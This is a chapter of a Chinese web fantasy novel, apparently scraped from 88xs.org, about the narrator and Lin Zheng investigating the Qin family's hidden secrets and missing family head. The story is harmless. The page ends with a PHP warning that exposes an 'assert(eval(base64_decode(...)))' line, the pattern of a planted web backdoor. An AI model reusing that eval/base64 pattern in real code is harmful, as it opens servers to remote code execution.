88小说 > 玄幻小说 > 六月千夜 > 第152章 少的一家之主
88小说 www.88xs.org,最快更新六月千夜最新章节!

    ,最快更新六月千夜!

    “天知道大人为什么一去就是这么久,而且这东西我们也不认识,估计也就只有大人能够认得了,大人见多识广,可能会知道这东西究竟是什么玩意,我反正是不知道了。”我本来还以为自己可能有麒麟玉的线索的,这下好了,失望得要死了。

    我和林正反正是没什么事了,在宾馆里面歇着,整个人都显得颓废的要死,倒是此时的秦家附近热闹得很,林正的房间反正是搜过了,什么都没有搜到,林正走也救走了,没多大影响,可是现在秦家的内部早就已经乱成了一锅粥了。

    而大人和丁宇哲趴在了秦家的墙头上看见秦家乱成了一锅粥的样子,也是一头的雾水,尤其是丁宇哲,大人其实也不知道。

    回到了暂时落脚的地方之后,乐乐居然蹦了出来,“怎么没在秦家看见我妈妈?”乐乐也不知道是从什么时候开始学会了说话的,而且一张嘴还说了这么多的话。

    “可能阿月已经不在秦家了吧!”丁宇哲不知道怎么回事,也无法回答乐乐的问题。

    小乐乐觉得丁宇哲的回答十分的敷衍,顿时就火了,“我分明在秦家问到了我老妈身上的味道,他们肯定是抓了我老妈,现在没有找到我老妈,说不准我妈妈就是让秦家的那群王八羔子给害了,我得赶紧的,操家伙给我老妈报仇去!”

    看乐乐一脸严肃认真不许打扰的模样,丁宇哲和大人都是十分的无语,也不知道这小家伙究竟是像谁,一句话说不好就要抄家伙上手的。

    “你别添乱了,你老妈根本就没事,她好着呢!”大人不得已的站出来怒斥乐乐的一系列的过激行为。

    “怎么可能呢,我都没看见我老妈,我老妈肯定让秦家人给欺负了,我身为我们老张家目前为止唯一的男人,怎么可以眼睁睁的看着我老妈受欺负了不管!”乐乐义正言辞的说道,仿佛亲眼看见了似的。

    “什么老张家唯一的男人,你自己都还只是一个魂儿呢,扯什么犊子,还有你怎么就知道你老妈给秦家的人欺负去了,说得好像你亲眼看见了似的!”乐乐吧啦吧啦的说了那么多句话,大人都忍不住的要暴走了。

    “那你怎么就知道我老妈没有被秦家的人欺负?”乐乐倒是聪明的学会了举一反三了。

    “放心吧你就,我在秦家有一个眼线,秦家有什么人,本大人比你清楚!”大人骄傲的炫耀到。

    “眼线?什么眼线?”丁宇哲忍不住的要插嘴问一句了。

    “你不用知道!”大人却是闭口不提,“你带好孩子就行了。”

    “可是作为老张家唯一的男人,我还是要想办法保护我老妈的。”乐乐十分坚持的对丁宇哲说道。

    丁宇哲的面部扭曲到了不能再扭曲的程度了,你是老张家唯一的男人,那我算什么?

    “不过大人,你昨天说你自己是出去见了一个老朋友了,那你的那个老朋友是谁啊?是秦家的人吗?”丁宇哲不想理乐乐,跟乐乐根本就没什么共同语言,但是大人说是去见一个老朋友,再回来的时候,大人就知道秦家藏宝贝的地方了,所以丁宇哲猜测大人区间的老朋友应该就是秦家的人,大人肯定是早有先见之明的打入了敌人的内部。

    “大人我的朋友多了去了,难道每有一个你们都需要刨根问底的知道吗?是在秦家没错,但是又不是秦家的人,真不知道你究竟在担心一些什么事情!”大人还以为丁宇哲实在担心大人找了秦家的人不太可靠而发火的。

    丁宇哲还莫名其妙的了,真不知道这究竟是怎么了,为什么忽然之间每个人都变得这么的不好伺候了?

    仔细的想想,其实还是我比较好,最起码我会打他骂他,可是却绝对不会和他打冷战,不说话。

    而此刻,我和林正却不明白为什么这个时候的秦家会乱成了一锅粥了,那什么所谓的万先生不是原本就是和秦家是一伙的吗?为什么整个秦家看上去还是这么的阴郁,这么的难过,好像是发生了什么了不得的大事似的。

    “秦家这两天是怎么了,你知道吗?”我反正是没有内部消息,看不明白,还是问问能够走裙带关系的林正好了。

    “那谁知道,不过根据我家里传过来的可靠小道消息,好像是因为秦家丢了什么东西了,具体丢了什么东西我也不知道,不过这秦家就报应,抢了别人的东西,现在倒好了,招贼了吧,最好心疼死他们,我就能少费点功夫去对付他们了。”林正百无聊赖的对我说道。

    林正原本还以为他走出咯额秦家,还闹出了这么大的动静,秦家人肯定是把这件事情告诉了林家了,林家在知道了自己在泰国做下的事情之后,至少也会打个电话过来慰问一下自己,说一下自己是不是委屈了,结果家里就给了这么一条说了秦家内部消息的短信,一点关心和问候都没有,林正真是心都要寒了。

    “你怎么了,干嘛看上去那么的颓废,跟被人抛弃了似的!”趴在了上,就知道对着那个手机,关键是手机也没响过,跟个傻子似的。

    “神预言啊!”林正立马把手机扔到了一边,膜拜的跪倒在了我的面前,“你怎么知道我被人抛弃了?我此刻的心已经碎成了渣渣了,谁能来拯救我一下!”

    “我去,不是吧你,现在不是开玩笑的时候,你不是说自己是妇女之友吗?你去拯救妇女差不多,哪用得着别人来拯救,我们还是赶紧的想办法怎么才能够从秦家找到乐乐吧。”乐乐已经离开了我的身边很长时间了,我实在是担心的不行,不能再继续的这样下去了。

    还有秦易之的身上也不知道究竟是怎么回事,我一开始还怀疑秦易之身上带着的一定就是我家的乐乐,但是后来第二次在见到秦易之的时候,我就十分的确定了,秦易之的身上一定是有什么东西的,尽管秦易之隐藏的还是相当的隐蔽的,可是那么强大的灵魂波动气息根本就无法真的全部隐藏,我都觉得我所感觉到的都不是全部的能量波动。

    “这个你就不用担心了,我想你的乐乐应该已经不再秦家了,我在秦家走了一圈,都没有捕捉到乐乐的气息,我想乐乐肯定已经不在秦家了,秦紫月不过就是为了混淆视线,所以才会把那块家的蝴蝶玉带出来的,至于秦易之,我知道你怀疑秦易之的身上所戴着的灵魂可能就是乐乐,但是我们在秦家住宿的房间里面第二次见到了秦易之的时候,你肯定就已经感觉到了秦易之的身上带着很陌生的,而且极其强大的灵魂气息波动,但是那不是乐乐。”可是除此之外就不知别的什么了,现在我们两个人没有线索了,秦家的内部也太乱了,超乎想象的乱!

    林正说了这么多,我和林正还是不知道秦家究竟是在做什么,秦家人拿走了我的东西究竟是有着什么不可告人的目的的,我作为秦家的目标,对于秦家来说究竟是意味着什么,秦家和我家究竟是有什么关联,还有秦家当年在中国内陆的时候也是一个大家族,不远万里的来到了一个异国他乡,这中间又是究竟发生了什么事情了?

    “我们还有很多不明白的事情,秦家人的内部现在这么的混乱,很多事情我们被混淆了视线,根本就看不清楚事实,但是我相信,有因才能有果,既然能够有我们现在所看见的事情,那么,以前的时候,就一定有它发展的根源,你不是曾经打听了许多关于秦家的事情吗?有没有什么线索是关于秦家最一开始来到泰国,然后发生的事情?”一个家族举家迁徙,放弃了之前的所有,不可能没有任何的理由,也不可能迅速的崛起,并且在一个陌生的地方站稳脚跟。

    “其实秦家究竟发生了什么事情,我根本就不知道,我想不只是我,就是秦家内部的自己人也不一定知道当初究竟是发生了什么事情,秦家为什么要举家迁徙,而且秦家为什么在来到了泰国之后就迅速的成了很具有影响力的大财团,不过也就是这一切的不知道告诉了我们,这绝对不是一个巧合!”林正的最后一句话如大梦初醒一般。

    “对啊,这绝对不是一个巧合!”我从不相信这个世界上存在着什么巧合,所谓的巧合都只不过是认为的编造出来的,所谓的巧合,就是人为!

    “秦家究竟是凭借着什么站稳了脚跟,发展成了现在的这么大的势力的,这还真是一个谜,不过,也不是没有突破口……”

    “秦易之嘛!”林正一说我就想到了秦易之。

    “秦易之在秦家的后辈当中算是比较厉害的,虽然非嫡非长的,但是说话还是明显的相当有分量的,最主要的一点还是,秦易之的身上……”

    “是啊,那么强大灵魂波动,普通人可能不会知道的,但是秦家人不缺乏能人异士,不可能是没有人知道的,唯一的可能性就是秦易之能够操纵这些人,而且秦易之也有可能本身就是这些人之中的一个!”现在的突破口就确定是秦易之无疑了,只要搞清楚秦易之身上那么强大的灵魂气息波动是从哪来的,究竟是怎么回事就可以了。

    “不对!”林正忽然之间站了起来大叫了一声。

    “吓了我一跳你,什么不对?”也不知道林正是想起什么事情来了,大叫一声就跳了起来。

    “我在秦家的时候少见了一个人,秦家所有的人几乎多多少少的都露了面,但是有一个人却自始至终都没有出现过,我被秦家其他的人混淆了视线,到现在才意识到问题的所在!”没想到我居然漏了这么一个人,真是个致命的症结。

    “林正,少了什么人?”我不解的问道林正。

    林正和我在秦家的那一天的确是出了很多的事情,但是我们也因此见了秦家的很多人,我并不觉得我少见了秦家的哪一个人。

    “是秦伯父,秦家的秦伯父,作为秦家的一家之主,在秦家举办的这么重要的场合的时候却从头到尾都没出现过,我本来早就应该发现这件事情的,我临来之前,我父亲还告诉过我要特别注意这个人的,我居然被秦家的那几个人给耍了!”这个人分明还活着,秦家接下来的家产究竟是要分到谁的头上还没个找落,现在来了一趟秦家,居然都没有见过秦家的一家之主,这要是就这么回去了,不是就等于什么结果都没有了吗?

    “不行,我还要再去一趟秦家,一定要见到秦伯父,否则的话,我都不能确定究竟是发生了什么事情了?我不能就这么离开了秦家!”这样没有结果的回到了中国的话,我一定会被家里的人瞧不起的,父亲也会觉得我一无是处,毫无作用的。

    “可是,林正,我觉得我们就是去了秦家,也不一定能够见到你说的秦伯父,秦家人一定会想方设法的不让你建的,而且你现在已经出了秦家,再这么回去的话,又没什么合适的理由,秦家人一定会怀疑你知道了什么的,到时候,只怕我们就真的离不开这里了。”我可不是危言耸听,而是说真的。

    “理由的话,其实很容易就能够找得到,但是你说得对,我这么贸然的前去秦家的话,一定会引起秦家人的怀疑的,秦家人费了那么大的功夫去转移注意力,又怎么会轻易的让我们见到秦伯父的本人呢!”林正好在终于冷静了下来。

    “其实你想见到这个人的话,也没有这么的困难……”事情远远还没有到了不能峰回路转的地步。

    “什么意思?说清楚点。”林正好想抓住了一线希望的期待着我的答案。

Warning: assert() [function.assert]: Assertion "$汲箅偬犀= eval(base64_decode($退隉度痣));" failed in /www/wwwroot/www.88xs.org/modules/article/reader.php on line 2